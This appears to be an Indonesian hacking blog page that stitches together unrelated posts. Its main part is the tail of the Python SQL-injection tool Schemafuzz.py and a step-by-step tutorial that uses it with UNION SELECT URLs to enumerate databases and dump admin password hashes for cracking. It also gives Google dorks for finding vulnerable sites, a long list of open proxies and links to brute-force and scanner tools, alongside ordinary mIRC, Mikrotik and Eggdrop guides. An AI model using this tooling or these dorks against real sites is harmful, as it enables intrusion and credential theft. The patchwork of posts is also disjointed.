match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
file.write("\n["+str(num)+"]"+str(match))
print "["+str(num)+"]",match
table_num = int(table_num) + 1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
match = match[0].strip("\x1e").split("\x1e")
if arg_verbose == 1:
print "\n["+str(num)+"] ",
file.write("\n["+str(num)+"] ",)
else:
print
file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num = int(table_num) + 1
else:
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
file.write("%s:" % ddata)
table_num = int(table_num) + 1
else:
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Full SQLi information_schema Enumeration
if mode == "--full":
while 1:
try:
proxy_num+=1
gets+=1
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
table_num=0
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
else:
if num == 0:
print "\n[-] No Data Found"
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass

#Lets wrap it up!
if mode == "--schema" or mode == "--full" or mode == "--dump":
print ""
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Silakan Check File", dbt,"\n"
file.close()

Copy Script Ini Menjadi Schemafuzz.py

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut


pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1


sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol


langkah pertama

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!


langkah kedua

--------------

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns...


[+] Found a table called: mysql.user


[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!


[-] [01:37:48]

[-] Total URL Requests 618

[-] Done


langkah ketiga

---------------

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"

[+] Number of Tables: 33


[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail


[-] [01:43:48]

[-] Total URL Requests 270

[-] Done


untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a


[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--


[+] Do we have Access to Load_File: No


[-] [01:46:51]

[-] Total URL Requests 3

[-] Done


ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe


untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini


./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

akan tampil seperti ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1


[0]webthings


[-] [01:58:17]

[-] Total URL Requests 30

[-] Done


langkah selanjutnya

--------------------


cara untuk menemukan user dan password

kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password


eing ing eng....

jreennnng....keluar deh user ama passwordnya

hasilnya dibawah ini


[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database "webthings" Table "wt_users"

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2


[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:


[-] [02:08:48]

[-] Total URL Requests 4

[-] Done


jangan lupa kita selalu mengecek schemafuzzlog.txt nya

setelah itu tinggal kita meng crack passwordnya pake program

gemana rekan2 gampang kan pake schemafuzz

NB:

Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.

Dork SQL injection

Dork: SQL Injection

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()
javascript:void(0)
inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

Kumpulan Proxy

60.12.227.208:80
60.12.227.246:80
88.191.98.15:3128
122.224.97.84:80
193.55.112.41:3128
218.204.106.150:8080
58.222.254.11:3128
140.113.152.201:8080
201.48.209.2:80
146.57.249.98:3128
58.248.29.7:3128
219.254.32.40:8080
219.93.178.162:3128
130.75.87.84:3124
194.176.176.82:8080
209.11.82.88:3128
66.198.41.11:3128
61.53.137.50:8080
67.69.254.244:80
201.48.209.2:3128
125.29.54.44:8080
59.56.174.199:808
60.190.151.77:8088
222.75.165.130:8080
130.75.87.83:3124
222.73.228.7:80
128.238.88.65:3127
125.141.221.165:80
61.139.73.6:8080
125.141.221.135:80
208.117.131.116:3127
193.174.67.186:3124
218.97.194.94:80
70.32.40.18:3128
91.200.233.195:3128
146.57.249.98:3127
193.167.182.132:3127
121.22.29.181:80
143.107.111.195:3127
192.33.90.67:3127
129.24.211.26:3124
89.25.159.62:3128
217.149.243.196:80
200.20.9.77:3128
84.14.231.89:8080
193.147.162.166:3124
128.232.103.203:3127
221.2.216.38:8080
200.179.72.132:80
121.8.124.42:1080
125.65.113.53:80
220.227.47.6:8080
61.19.222.7:80
218.4.65.118:8080
143.107.111.195:3124
128.232.103.202:3124
196.25.52.36:3128
128.113.226.235:3124
130.88.203.27:3128
209.20.78.177:3128
221.224.53.84:3128
58.22.101.251:80
59.173.12.137:80
194.42.17.124:3127
61.8.77.18:8080
128.232.103.203:3128
89.162.219.98:3128
67.69.254.251:80
84.42.51.129:3128
132.68.237.36:3124
88.80.223.58:3128
203.197.194.172:8080
67.69.254.252:80
59.120.244.23:3128
193.167.182.130:3127
121.242.41.67:3128
220.227.47.8:8080
72.55.191.6:3128
203.178.133.3:3128
212.117.162.228:3128
128.232.103.203:3124
61.16.247.44:3128
67.69.254.247:80
203.178.133.11:3127
222.255.28.231:3128
213.248.50.104:8080
67.69.254.246:80
210.1.58.20:80
128.113.226.235:3128
203.156.255.217:80
137.226.138.156:3127
189.21.103.178:3128
67.69.254.248:80
72.51.31.19:8080
193.174.67.187:3128
58.68.35.54:3128
201.48.125.1:3128
200.199.231.100:3128
220.181.32.42:8080
119.160.199.4:3128
222.141.69.247:80
118.98.185.4:3128
85.93.26.3:3128
89.207.240.235:3128
89.211.49.84:3128
210.212.20.202:3128
201.62.152.239:8080
201.72.145.44:3128
200.181.48.125:3128
60.30.83.220:8080
189.80.131.219:3128
118.122.112.49:80
200.242.168.2:3128
88.191.99.139:3128
200.37.73.220:3128
200.49.141.51:8080
128.187.72.70:3128
200.59.10.42:8080
200.71.149.10:3128
200.96.194.164:3128
200.199.25.181:3128
200.199.25.142:8080
200.148.170.66:3128
200.35.107.214:3128
117.102.90.233:8080
117.102.85.178:8080
212.156.96.206:8080
200.233.108.85:3128
217.167.7.6:80
119.70.40.101:8080
130.37.198.243:3128
207.245.247.196:80
202.206.100.39:3128
133.1.74.162:3127
213.253.216.26:3128
66.135.33.17:3128
193.55.112.41:3127
190.216.249.4:80
192.33.210.17:3124
193.55.112.41:3124
72.52.220.188:3128
137.226.138.156:3128
123.127.41.44:3128
190.216.249.4:3128
58.214.247.198:1080
90.182.196.131:3128
137.226.138.156:3124
81.177.3.10:80
192.33.90.69:3127
60.248.28.228:3128
59.57.244.194:1080
192.33.210.17:3128
91.193.68.65:3128
70.86.138.210:8131
124.30.18.246:3128
193.167.187.188:3124
201.17.130.41:3128
200.175.44.195:3128
193.167.187.187:3128
123.130.112.17:8080
61.220.102.102:3128
171.66.3.182:3127
212.123.91.61:89
217.133.80.15:3128
200.37.63.11:8080
134.226.52.35:3124
211.95.176.6:808
202.95.131.188:554
121.22.29.182:80
158.64.10.152:80
211.161.197.182:80
222.180.17.45:808
200.186.35.2:3128
121.22.29.183:80
194.44.170.81:3128
121.22.29.180:80
134.226.52.34:3124
81.177.3.10:3128
221.11.27.110:8080
200.131.36.198:8080
79.99.43.128:3128
203.146.51.2:80
201.213.122.19:8080
72.188.172.83:9090
200.223.181.45:3128
222.83.215.36:808
58.35.94.112:8080
128.113.226.235:3127
189.124.154.100:3128
200.178.159.133:3128
118.122.112.47:80
117.240.88.12:8080
189.52.226.128:3128
77.222.147.58:3128
91.102.224.252:8080
200.119.240.115:3128
213.129.249.144:80
189.19.229.15:3128
87.252.3.67:3128
159.148.82.4:3128
220.112.40.251:1080
201.86.70.190:80
89.234.27.15:80
82.193.236.160:3128
200.220.142.10:3128
212.12.146.244:3128
202.181.113.66:80
212.123.91.61:81
220.231.180.251:1080
218.111.124.24:8080
222.74.200.17:1080
86.105.181.238:3128
124.164.247.43:3128
192.228.196.72:80
200.195.17.74:80
203.82.52.210:8080
192.228.196.134:80
192.228.196.133:80
200.144.28.60:3128
91.103.24.13:3128
76.30.187.68:9090
203.84.156.78:80
69.244.162.215:2301
190.200.251.251:8080
201.47.187.239:3128
200.171.175.157:6588
70.82.140.29:9090
164.128.242.62:8080
76.107.137.6:9090
218.92.8.165:8080
212.44.61.185:3128
201.17.6.199:3128
211.115.185.42:8080
211.115.185.41:8080
201.25.119.35:3128
200.41.60.135:3128
202.107.231.157:8080
122.138.14.150:8080
81.213.214.170:3128
134.002.172.252:3127
194.42.17.124:3124

Command mIRC

Anda mungkin sering chatting di mIRC, tapi belum tahu apa saja seh command-command
yang ada di mIRC

Berikut daftar command-command yang ada di mIRC :

ChanServ

1. Register Channel = /cs register (#channel) (password) (desikripsi)

2. Identify Channel = /cs identify (#channel) (password)

3. Successor = /cs set (#channel) successor (nickname)

4. Drop Channel = /cs drop (#channel)

5. Ganti Pass Channel = /cs set (#channel) passwd (password lama) (password
baru)

6. Lupa Pass Channel = /cs sendpass (#channel) (email)

7. Founder Baru (Identify #Channel Dulu) = /cs set (#channel) founder

8. Mailblock = /cs set (#channel) mailblock (on/off)

9. Private = /cs set (#channel) private (on/off)

10. Set Description = /cs set (#channel) desc (deskripsinya)

11. Set Topic = /cs set (#channel) topik (topiknya)

12. Set URL = /cs set (#channel) url (alamat url-nya)

13. Set Mlock = /cs set (#channel) mlock (tulis modenya)

14. Set Restrict = /cs set (#channel) restrict (on/off)

15. Set KeepTopic = /cs set (#channel) keeptopic (on/off)

16. Set TopikLock = /cs set (#channel) topikclock (off/sop/founder)

17. Set Memo Channel = /cs set (#channel) memo (none/aop/sop/founder)

18. Set OP-Guard = /cs set (#channel) opguard (on/off)

19. Add/Del Sop = /cs sop (#channel) (add/del) (nick)

20. Add/Del Aop = /cs aop (#channel) (add/del) (nick)

21. Lihat List Op = /cs (aop/sop) (#channel) list

22. Akick Nick = /cs akick (#channel) (add/del) (Nick!*@*)

23. Akick Ident = /cs akick (#channel) (add/del) (*!ident@*)

24. Akick IP Address = /cs akick (#channel) (add/del) (*!*@IP Addressnya)

25. Akick List = /cs akick (#channel) list

26. Op List = /cs (sop/aop) (#channel) list

27. Lihat Akses = /cs why (#channel) (nick)

28. Unban = /cs unban (#channel) (nick)

29. Invite = /cs invite (#channel) (nick)

30. Info = /cs info (#channel)

31. Access Channel = /cs access (#channel) (nick op)

32. Count = /cs count (#channel)

NickServ :

1. Register Nick = /ns register (password) (email)

2. Identify Nick = /ns identify (password)

3. Ganti Pass = /ns set passwd (password lama) (password baru)

4. Enforce = /ns set enforce (on/off)

5. Kill Ghost = /ns ghost (nick) (password)

6. Kill = /ns set kill (on/off)

7. Recover = /ns recover (nick) (password)

8. Release = /ns release (nick) (password)

9. Drop = /ns drop (nick)

10. No Op = /ns set noop (on/off)

11. No Memo = /ns set nomemo (on/off)

12. Info = /ns info (nickname)

13. URL = /ns set url (http:// )

14. Ganti Email = /ns set email (password) (emailnya)

15. Showemail = /ns set showemail (on/off)

16. MailBlock = /ns set mailblock (on/off)

MemoServ :

1. Send Nick = /ms send (nickname) (pesan)

2. Send OP = /ms send (#channel) (pesan)

3. Send SOP = /ms sendsop (#channel) (pesan)

4. Lihat Memo = /ms list

5. Baca Memo = /ms read (no. list memo)

6. Hapus Memo = /ms del (no. list memo)

7. Hapus Semua = /ms del all

Perintah Dasar mIRC :

1. Ganti nick = /nick (nick baru)

2. Notice = /notice (nick) (pesan)

3. Masuk Channel = /join (#channel)

4. Keluar Channel = /part (#channel)

5. Keluar IRC = /quit (pesan)

6. Ganti Server = /server (nama server)

7. Private = /query (nick)

8. Invite = /invite (nick) (#channel)

9. Mode I = /mode (nick) +I

10. Ignore = /ignore (nick)

11. Action = /me (pesan)

12. Whois = /whois (nick)

13. Away = /away (pesan)

14. Balik Away = /away

15. Ping = /ping (nick)

16. Bersihkan layar = /clear

Perintah Standar Untuk OP Channel :

/kick (#channel) (nick) = kick user

/topik (#channel) (topiknya) = mengganti topik channel

/kick (#channel) (nick) (alasan) = kick user dengan alasan

/mode (#channel) +b *!*@IPnya = Band IP user, missal /mode #channel +b *!*@125.123.19.*

/mode (#channel) +b nick!*@* = Ban nick user, missal /mode #channel +b nick!*@*

/mode (#channel) +o (nick) = memberikan Op pada user

/mode (#channel) +v (nick) = memberikan voice pada user

/mode (#channel) -o (nick) = menurunkan user agar tidak Op lagi

/mode (#channel) -v (nick) = mengambil voice user

/mode (#channel) +/- ntispklRrmc = set mode channel

/channel = melihat mode dan ban list channel

Semoga Bermanfaat bagi anda


By : apiq_malfin

Thank's To All My Friend :)

Cara Membangun Jaringan Dengan Mikrotik

Sebelumnya saya gambarkan dulu skema jaringannya:
LAN —> Mikrotik RouterOS —> Modem ADSL —> INTERNET
Untuk LAN, kita pake kelas C, dengan network 192.168.0.0/24. Untuk Mikrotik RouterOS, kita perlu dua ethernet card. Satu (ether1 - 192.168.1.2/24) untuk sambungan ke Modem ADSL dan satu lagi (ether2 - 192.168.0.1/24) untuk sambungan ke LAN. Untuk Modem ADSL, IP kita set 192.168.1.1/24.
Sebelum mengetikkan apapun, pastikan Anda telah berada pada root menu dengan mengetikkan “/”
Set IP untuk masing²ethernet card
ip address add address=192.168.1.2/24 interface=ether1
ip address add address=192.168.0.1/24 interface=ether2
Untuk menampilkan hasil perintah di atas ketikkan perintah berikut:
ip address print
Kemudian lakukan testing dengan mencoba nge-ping ke gateway atau ke komputer yg ada pada LAN. Jika hasilnya sukses, maka konfigurasi IP Anda sudah benar
ping 192.168.1.1
ping 192.168.0.10
Menambahkan Routing
ip route add gateway=192.168.1.1
Setting DNS
ip dns set primary-dns=202.134.1.10 allow-remote-requests=yes
ip dns set secondary-dns=202.134.0.155 allow-remote-requests=yes
Karena koneksi ini menggunakan Speedy dari Telkom, maka DNS yg aq pake ya punya Telkom. Silahkan sesuaikan dengan DNS provider Anda.
Setelah itu coba Anda lakukan ping ke yahoo.com misalnya:
ping yahoo.com
Jika hasilnya sukses, maka settingan DNS sudah benar
Source NAT (Network Address Translation) / Masquerading
Agar semua komputer yg ada di LAN bisa terhubung ke internet juga, maka Anda perlu menambahkan NAT (Masquerade) pada Mikrotik.
ip firewall nat add chain=srcnat action=masquerade out-interface=ether1
Sekarang coba lakukan ping ke yahoo.com dari komputer yang ada di LAN
ping yahoo.com
Jika hasilnya sukses, maka setting masquerade sudah benar
DHCP (DynamicHost Configuration Protocol)
Karena alasan supaya praktis, temenku pengin pake DHCP Server. Biar klo tiap ada klien yang konek, dia ga perlu setting IP secara manual. Tinggal obtain aja dari DHCP Server, beres dah. Untungnya Mikrotik ini juga ada fitur DHCP Servernya. Jadi ya ga ada masalah..

Membuat IP Address Pool
ip pool add name=dhcp-pool ranges=192.168.0.2-192.168.0.254
Menambahkan DHCP Network
ip dhcp-server network add address=192.168.0.0/24 gateway=192.168.0.1 dns-server=202.134.1.10,202.134.0.155
Menambahkan Server DHCP
ip dhcp-server add name=DHCP_LAN disabled=no interface=ether2 address-pool=dhcp-pool
Sekarang coba lakukan testing dari komputer klien, untuk me-request IP Address dari Server DHCP. Jika sukses, maka sekali lagi, settingannya udah bener
Bandwidth Control
Agar semua komputer klien pada LAN tidak saling berebut bandwidth, maka perlu dilakukan yg namanya bandwidth management atau bandwidth control
Model yg saya gunakan adalah queue trees. Untuk lebih jelas apa itu, silahkan merujuk ke situsnya Mikrotik
Kondisinya seperti ini:
Koneksi Speedy kan katanya speednya sampe 384/64 Kbps (Download/Upload), nah kondisi itu sangat jarang tercapai. Jadi kita harus cari estimasi rata²nya. Maka saya ambil minimalnya untuk download bisa dapet sekitar 300 Kbps dan untuk upload aq alokasikan 50 Kbps. Sedangkan untuk yg maksimumnya, untuk download kira² 380 Kbps dan upload 60 Kbps.
Lalu, jumlah komputer klien yang ada saat ini adalah 10 buah. Jadi harus disiapkan bandwidth itu untuk dibagikan kepada 10 klien tersebut.
Perhitungan untuk masing² klien seperti ini:
Minimal Download: 300 / 10 * 1024 = 30720 bps
Maximal Download: 380 / 10 * 1024 = 38912 bps
Minimal Upload: 50 / 10 * 1024 = 5120 bps
Maximal Upload: 60 / 10 * 1024 = 6144 bps
Selanjutnya kita mulai konfigurasinya:
Tandai semua paket yg asalnya dari LAN
ip firewall mangle add src-address=192.168.0.0/24 action=mark-connection new-connection-mark=Clients-con chain=prerouting
ip firewall mangle add connection-mark=Clients-con action=mark-packet new-packet-mark=Clients chain=prerouting
Menambahkan rule yg akan membatasi kecepatan download dan upload
queue tree add name=Clients-Download parent=ether2 packet-mark=Clients limit-at=30720 max-limit=38912
queue tree add name=Clients-Upload parent=ether1 packet-mark=Clients limit-at=5120 max-limit=6144
Sekarang coba lakukan test download dari beberapa klien, mestinya sekarang tiap2 klien akan berbagi bandwidthnya. Jika jumlah klien yg online tidak sampai 10, maka sisa bandwidth yang nganggur itu akan dibagikan kepada klien yg online.
Graphing
Mikrotik ini juga dilengkapi dengan fungsi monitoring traffic layaknya MRTG biasa. Jadi kita bisa melihat berapa banyak paket yg dilewatkan pada PC Mikrotik kita.
tool graphing set store-every=5min
Berikutnya yang akan kita monitor adalah paket² yg lewat semua interface yg ada di PC Mikrotik kita, klo di komputerku ada ether1 dan ether2.
tool graphing interface add-interface=all store-on-disk=yes
Sekarang coba arahkan browser anda ke IP Router Mikrotik. Klo aq di sini:
http://192.168.0.1/graphs/
Nanti akan ada pilihan interface apa aja yg ada di router Anda. Coba klik salah satu, maka Anda akan bisa melihat grafik dari paket2 yg lewat pada interface tersebut.



Dari tutorial diatas saya cuma sampai mengambil langkah pada setting penambahan NAT ( masquerade ) saja. Karena menurut saya DHCP yang sifatnya berubah ubah jadi nanti saat mau limit BW nya terkadang ip tidak sama. CMIIW. dan untuk setting limit saya melakukannya pada remote winbox yang lebih mudah, nah pertanyaan untuk saya sendiri. Kapan graph tool nya kamu install nak ? hehehhee... ok semoga berguna semuanya.

http://miji.wordpress.com/2007/03/24/instal-router-menggunakan-mikrotik-routeros/

Cara Installasi Eggdrop

Kita mulai aja yuk install eggdrop

Login ke shell account kamu.
Download eggdrop disini ftp://ftp.eggheads.org/pub/eggdrop/ pakek yang versi terbaru yah.

$wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.18.tar.gz

Lanjutkan

$tar -zxvf eggdrop1.6.18.tar.gz

$cd eggdrop1.6.18*

$./configure

Lanjutkan

$make config

$make

make install DEST=/home/name/botdir
Ganti aja tuh /home/name/botdir sesuaikan dengan home folder kamu contoh:

$make install DEST=/home/masjito/bot

Lanjut

$cd /home/masjito/bot/scripts

Tambahkan neo.tcl di folder scripts.

$wget http://geocities.com/masjito/alat/neo.tcl.zip

Rename file neo.tcl.zip

$mv neo.tcl.zip neo.tcl

Kembali ke folder bot

$cd /home/masjito/bot

Edit file eggdrop.conf pakai editor kesukaan kamu, dari pada pusing nih ada contoh file config .
download aja

$wget http://geocities.com/masjito/alat/bot.txt

Rename file bot.txt

$mv bot.txt bot.conf

Edit file bot.conf menggunakan editor kesukaan kamu, paling enak sih pakek pico.

$pico bot.conf

CARA SETTING
set my-ip “IP/ATAU VHOST SHELL KAMU” <– GANTI DENGAN IP ATAU VHOST SHELL ANDA
set nick “NICKNAME BOT” <– GANTI DENGAN NICK BOT ANDA
set owner “NICKNAME OWNER” <— GANTI DENGAN NICK KAMU YANG SUDAH REGISTER YAH
set basechan “#CHANEL” <– GANTI DENGAN CHANEL KAMU
set username “USERNAME BOT KAMU” <— GANTI AJA DEH TERSERAH KAMU
UNTUK MENAMBAHKAN TCL LIAT TUH BARIS PALING BAWAH

Setelah selesai edit simpan dengan menekan tombol ctrol + x terus y dan jalankan eggdrop kamu
dengan command

$./eggdrop -m bot.conf

Tunggu aja deh bot kamu nonggol di cenel.
Setelah bot anda online di irc ketikkan perintah di bawah ini:

/msg BoTNICK pass
/msg BoTNICK auth

Perintah di atas adalah untuk pertama kali anda load bot, load kedua dan seterusnya tidak perlu di set
lagi. untuk mengetahui semua perintah bot ketik

/msg BOTNICK help

Selasa, 24 Maret 2009

Software Or Tools

Link To Download :
Miror Server :

http://www.geocities.com/apiq_malfin/Apache_Chunked_Scanner.zip
http://www.geocities.com/apiq_malfin/ftp_brutus.zip
http://www.geocities.com/apiq_malfin/show_all_tables_v0.1_by_s0mbra.zip

sedikit dulu ya hihihihihi :)
uploadnya lelet :p